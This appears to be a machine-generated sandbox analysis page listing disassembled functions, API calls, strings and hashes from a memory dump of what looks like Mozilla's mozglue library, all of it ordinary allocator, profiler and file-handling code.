API String ID: 4057186437-125001283
Opcode ID: 6b6b61ae065b1ff40fd1f32c79b6e09eb7acece0087670b59f097c733bc9b087
Instruction ID: e3495435efbd9a7b42c480d0e461ac70a683d42d726bb1c2b74716c0000b268a
Opcode Fuzzy Hash: 6b6b61ae065b1ff40fd1f32c79b6e09eb7acece0087670b59f097c733bc9b087
Instruction Fuzzy Hash: 0121D6B5600104AFFB009F65D805B9A7B7DEB4626CF114218FF1897F81EB31E806CBA1

Function 6CCD8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6CC9EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC9EB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CCDB392,?,?,00000001), ref: 6CCD91F4

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

Strings

timeline-overview, xrefs: 6CCD907A
marker-chart, xrefs: 6CCD905E
data, xrefs: 6CCD90E8
marker-table, xrefs: 6CCD906C
timeline-fileio, xrefs: 6CCD90A4
timeline-memory, xrefs: 6CCD9088
name, xrefs: 6CCD8F16
stack-chart, xrefs: 6CCD90B2
timeline-ipc, xrefs: 6CCD9096

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: e8c657b2a37ea4dbb1ae9a8ab32be748ffdf52021e2baff5e5dcd037ffbfb93f
Instruction ID: 4669cdbaf1d22cd96f97686f0bf31550cae2f9df5d12a6dbb387def49d58af6a
Opcode Fuzzy Hash: e8c657b2a37ea4dbb1ae9a8ab32be748ffdf52021e2baff5e5dcd037ffbfb93f
Instruction Fuzzy Hash: F0B108B0B012099BDB04DF99D4A57EEBBB5BF85318F104019D606ABF90EB31A945CBD1

Function 6CCBC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCBC5A3
WideCharToMultiByte.KERNEL32 ref: 6CCBC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CCBC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CCBCA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CCBCA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCBCAA5

Strings

0, xrefs: 6CCBD30A
(null), xrefs: 6CCBC596

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 4a62d49b39b81aa02fc789082a90675fd32d7d8ec82edfe044728750c8aa80a8
Instruction ID: 3acefb1978f7752c554f30d648ea778f20a2d9279a050b22036aed198abfb54c
Opcode Fuzzy Hash: 4a62d49b39b81aa02fc789082a90675fd32d7d8ec82edfe044728750c8aa80a8
Instruction Fuzzy Hash: C6A1BC316083429FEB00DF69C554B5ABBF5BF89348F04882DE999E7642E735E805CB92

Function 6CC93480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CC93492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CC934A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CC934EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CC9350E
__Init_thread_footer.LIBCMT ref: 6CC93522
__aulldiv.LIBCMT ref: 6CC93552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CC9357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CC93592

Part of subcall function 6CCCAB89: EnterCriticalSection.KERNEL32(6CD1E370,?,?,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB94
Part of subcall function 6CCCAB89: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCABD1

Strings

kernel32.dll, xrefs: 6CC934EA
GetSystemTimePreciseAsFileTime, xrefs: 6CC93508

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: 52f05a515c563da9c824f230c04f510b7f0ab04e76c07a48b85f7f2668ec15ae
Instruction ID: 9acd01ce55ac35819dac389253a7b6468ad54c18e1a5ac28c434b1eb3aff6b92
Opcode Fuzzy Hash: 52f05a515c563da9c824f230c04f510b7f0ab04e76c07a48b85f7f2668ec15ae
Instruction Fuzzy Hash: DD319571B00105ABEF04EFB5D859AAA77BEFB49304F144019E605D3FA0EB74D906CB61

Function 6CC94480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6CCD4843,?), ref: 6CC945F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6CCD4843,?), ref: 6CC9468A
free.MOZGLUE(?,?,?,?,?,?,6CCD4843,?), ref: 6CC946C9
free.MOZGLUE(?), ref: 6CC946EF
free.MOZGLUE(?), ref: 6CC94712
free.MOZGLUE(?), ref: 6CC94735
free.MOZGLUE(?), ref: 6CC94758
free.MOZGLUE(?), ref: 6CC9477B
free.MOZGLUE(?), ref: 6CC9479E

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: e6f80174744df70ad7de2494a0252794e16b5bf1e441b2afb2f51fb95be22744
Instruction ID: ce9f1108b66c48b6fd5e3cfecacaecc37796b7441a12c302f71d30f7329fbc96
Opcode Fuzzy Hash: e6f80174744df70ad7de2494a0252794e16b5bf1e441b2afb2f51fb95be22744
Instruction Fuzzy Hash: C9B1E2B2A005508FDB18DF7CD89476D77A2AF46328F184669E426DFB96F731D840CB81

Function 6CCFAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6CCFAC52
CreateFileMappingW.KERNEL32 ref: 6CCFAC7D
GetSystemInfo.KERNEL32 ref: 6CCFAC98
MapViewOfFile.KERNEL32 ref: 6CCFACB0
GetSystemInfo.KERNEL32 ref: 6CCFACCD
MapViewOfFile.KERNEL32 ref: 6CCFAD05
UnmapViewOfFile.KERNEL32 ref: 6CCFAD1C
CloseHandle.KERNEL32 ref: 6CCFAD28
UnmapViewOfFile.KERNEL32 ref: 6CCFAD37
CloseHandle.KERNEL32 ref: 6CCFAD43
CloseHandle.KERNEL32 ref: 6CCFAD67

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: 15f4abe3e1175b268b607489b5d45f994ec9a54579603c9c705cea0e2cb0e529
Instruction ID: 4faa358df2daf03f7018880a7a9a3d8807362ce5b9b4e7b59a2e998e4d093d12
Opcode Fuzzy Hash: 15f4abe3e1175b268b607489b5d45f994ec9a54579603c9c705cea0e2cb0e529
Instruction Fuzzy Hash: D4318FB1A047049FEB00AFBCD64926EBBF4BF85304F01492DEA9587751EB70D449CB92

Function 6CC91E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CD1E784), ref: 6CC91EC1
LeaveCriticalSection.KERNEL32(6CD1E784), ref: 6CC91EE1
EnterCriticalSection.KERNEL32(6CD1E744), ref: 6CC91F38
LeaveCriticalSection.KERNEL32(6CD1E744), ref: 6CC91F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6CC91F83
LeaveCriticalSection.KERNEL32(6CD1E784), ref: 6CC91FC0
EnterCriticalSection.KERNEL32(6CD1E784), ref: 6CC91FE2
LeaveCriticalSection.KERNEL32(6CD1E784), ref: 6CC91FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC92019

Strings

MOZ_CRASH(), xrefs: 6CC92000

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: MOZ_CRASH()
API String ID: 2055633661-2608361144
Opcode ID: 1a1604745603f69a1eda75a3be3004d0aeb56432cf4db74ae0baf5e2a03f549f
Instruction ID: 06f7a56e9294917b34e46027671c49fd55fdb1081ced6f2a68536f2a5981cbb3
Opcode Fuzzy Hash: 1a1604745603f69a1eda75a3be3004d0aeb56432cf4db74ae0baf5e2a03f549f
Instruction Fuzzy Hash: 4241C6B1B043199BFF009FACC88AB6A7AB9EB49344F040129EA1597F41E771D805CBD1

Function 6CCA7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CCA7EA7
malloc.MOZGLUE(00000001), ref: 6CCA7EB3

Part of subcall function 6CCACAB0: EnterCriticalSection.KERNEL32(?), ref: 6CCACB49
Part of subcall function 6CCACAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CCACBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6CCA7EC4
mozalloc_abort.MOZGLUE(?), ref: 6CCA7F19
malloc.MOZGLUE(?), ref: 6CCA7F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CCA7F4D

Strings

d, xrefs: 6CCA7F89

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 2820ce26385f0e29a3fb04660e1a475dd962c17fc6942e6c9427caecaa77a293
Instruction ID: e9906381ab56e96717e8db72355cc5e5b7d4aca96b17f05775415f97b9f512ac
Opcode Fuzzy Hash: 2820ce26385f0e29a3fb04660e1a475dd962c17fc6942e6c9427caecaa77a293
Instruction Fuzzy Hash: 1431C461E006499BEB009F788C095BEB778EF95208F059229DD4957A12FB31AA89C391

Function 6CCA3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6CCA3CCC), ref: 6CCA3EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CCA3FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6CCA3CCC), ref: 6CCA4006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CCA40A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CCA3CCC), ref: 6CCA40AF
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6CCA3CCC), ref: 6CCA40C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CCA4134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CCA3CCC), ref: 6CCA4143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6CCA3CCC), ref: 6CCA4157

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: 4d7f18fe2d2b05adf463f08cc0c299bfac6ada6fa6a499404717d5d640c93345
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: 3AA182B1A00206CFDB40CFA9C884659B7B5FF48304F294199D9099F752E771E847CFA1

Function 6CCE9D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CCE8273), ref: 6CCE9D65
free.MOZGLUE(6CCE8273,?), ref: 6CCE9D7C
free.MOZGLUE(?,?), ref: 6CCE9D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CCE9E0F
free.MOZGLUE(6CCE946B,?,?), ref: 6CCE9E24
free.MOZGLUE(?,?,?), ref: 6CCE9E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6CCE9EC8
free.MOZGLUE(6CCE946B,?,?,?), ref: 6CCE9EDF
free.MOZGLUE(?,?,?,?), ref: 6CCE9EF5

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 2f37d7222f4ac68b315ad038e941659c333bd64f9dacff0a9aecb2370df6b1e5
Instruction ID: cd8a9310cfdc001f845ff43d5e0a0ac2494658aac40d281f24230135bfe5a28e
Opcode Fuzzy Hash: 2f37d7222f4ac68b315ad038e941659c333bd64f9dacff0a9aecb2370df6b1e5
Instruction Fuzzy Hash: 5671B0B0909B819BC712CF58C48059BF3F5FF9A314B448659E95A6BB01FB30F985CB81

Function 6CCEDDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6CCEDDCF

Part of subcall function 6CCCFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCCFA4B

Part of subcall function 6CCE90E0: free.MOZGLUE(?,00000000,?,?,6CCEDEDB), ref: 6CCE90FF
Part of subcall function 6CCE90E0: free.MOZGLUE(?,00000000,?,?,6CCEDEDB), ref: 6CCE9108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCEDE0D
free.MOZGLUE(00000000), ref: 6CCEDE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCEDE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCEDEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCEDEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CCDDEFD,?,6CCA4A68), ref: 6CCEDF32

Part of subcall function 6CCEDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CCEDB86
Part of subcall function 6CCEDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CCEDC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6CCDDEFD,?,6CCA4A68), ref: 6CCEDF65
free.MOZGLUE(?), ref: 6CCEDF80

Part of subcall function 6CCB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CCB5EDB
Part of subcall function 6CCB5E90: memset.VCRUNTIME140(6CCF7765,000000E5,55CCCCCC), ref: 6CCB5F27
Part of subcall function 6CCB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CCB5FB2

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: fb4a820b82563c0df68ba8eac0c822c17bbdc63cbc0b653fe206e8b338551d8c
Instruction ID: f1c492eacdc6b69b0f8bc343743060125c20f9e2ec9d6033dd6d9998b43b7f93
Opcode Fuzzy Hash: fb4a820b82563c0df68ba8eac0c822c17bbdc63cbc0b653fe206e8b338551d8c
Instruction Fuzzy Hash: CB51C4726016019BD711CB28C8846AEB376BFDB308F95012CD91A63B00FB31F95ACB92

Function 6CCF5D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5DC9
std::_Facet_Register.LIBCPMT ref: 6CCF5DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CCF5C8C,?,6CCCE829), ref: 6CCF5E45

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 80957c5581420f0246283b657d4a0a4185fd008db73797acf65f091749236234
Instruction ID: 5a591ac7d2952b61a009d75efafeb81d44413502a141d578fcbe4619840946cd
Opcode Fuzzy Hash: 80957c5581420f0246283b657d4a0a4185fd008db73797acf65f091749236234
Instruction Fuzzy Hash: D441B270B003049FEB04DFA5C999AAE77B9EF89314F148068D71697B91EB34E806CB61

Function 6CCCCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6CC931A7), ref: 6CCCCDDD

Strings

<jemalloc>, xrefs: 6CCCCF9F, 6CCCCFB3
: (malloc) Error in VirtualFree(), xrefs: 6CCCCFA4, 6CCCCFB8

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 13ed7ad1c1d7ed67cfcf4cb2dce75144c04764a889a2ac2f622c64d3055698d1
Instruction ID: e5cd10dde93461f11bcaedab1f648c1bb4b39c1cede97604f2247076441ef11e
Opcode Fuzzy Hash: 13ed7ad1c1d7ed67cfcf4cb2dce75144c04764a889a2ac2f622c64d3055698d1
Instruction Fuzzy Hash: F731A5707452056BFB10AFA98C46B6E7BB9BB45758F204019F611ABFC0FB70D401CBA2

Function 6CC9ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6CC9F100: LoadLibraryW.KERNEL32(shell32,?,6CD0D020), ref: 6CC9F122
Part of subcall function 6CC9F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC9F132

moz_xmalloc.MOZGLUE(00000012), ref: 6CC9ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6CC9EDCC
CreateFileW.KERNEL32 ref: 6CC9EE08
free.MOZGLUE(00000000), ref: 6CC9EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6CC9EE32

Part of subcall function 6CC9EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6CC9EBB5
Part of subcall function 6CC9EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6CCCD7F3), ref: 6CC9EBC3
Part of subcall function 6CC9EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6CCCD7F3), ref: 6CC9EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6CC9EDC1

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 517f52036b8995099fd29cf68dbc2093c914829d08eff4cfb82d83c71c328f8e
Instruction ID: 8ee26a0e9ae357f106887a595c8271ea5e562504b58d17875d14336b0594ffab
